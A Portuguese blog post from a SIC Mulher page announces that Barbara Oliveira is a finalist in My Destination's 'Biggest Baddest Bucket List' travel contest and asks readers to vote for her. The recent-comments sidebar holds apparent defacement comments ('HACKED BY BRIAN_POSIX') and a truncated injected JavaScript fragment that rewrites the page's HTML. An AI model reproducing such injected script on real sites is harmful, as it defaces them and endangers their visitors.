Barbara Oliveira representa Portugal nos dez finalistas do Biggest Baddest Bucket List, concurso global de My Destination.


Lançado no fim de Janeiro pelo My Destination, o Biggest Baddest Bucket List alcançou mais de 1400 pessoas inscritas, todas em busca de um único objetivo: a conquista da viagem dos sonhos. O vencedor viajará por seis meses pelo globo para os locais que desejar, a fazer reportagens de vídeo para o My Destination, com todas as despesas pagas, e levará ainda um prémio de $50,000.

Os participantes criaram as suas candidaturas por vídeo, apresentando os seus destinos favoritos em todo o planeta e aguardaram ansiosamente até ao dia 15 de Abril, quando finalmente foram divulgados os 10 finalistas, com um resultado agradável para os portugueses.


Agora, Barbara aguarda o dia 18 de maio, quando viajar para Londres para uma semana cheia de desafios e entrevistas. No dia 24 de maio, finalmente, o júri britânico Ben Southall, vencedor do concurso para “o melhor emprego do mundo” em 2009, anunciará o vencedor final do Biggest Baddest Bucket List. Entretanto, a Barbara precisa do vosso apoio – quanto mais apoio tiverem, melhores hipóteses terão de ganhar. Podem apoiá –la aqui:

http://www.mydestination.com/users/barbaraoliveira/bbb#tab

 

Por isso não deixe de apoiar, e não perca o Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!


Tags:

Barbara Oliveira @ 16:49

Seg, 13/05/13

 

O link acima não está a funcionar. Clique neste link para ver o meu vídeo de candidatura e para poder mostrar o seu apoio:
http://www.mydestination.com/users/barbaraoliveira/bbb#tab

Obrigada!

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO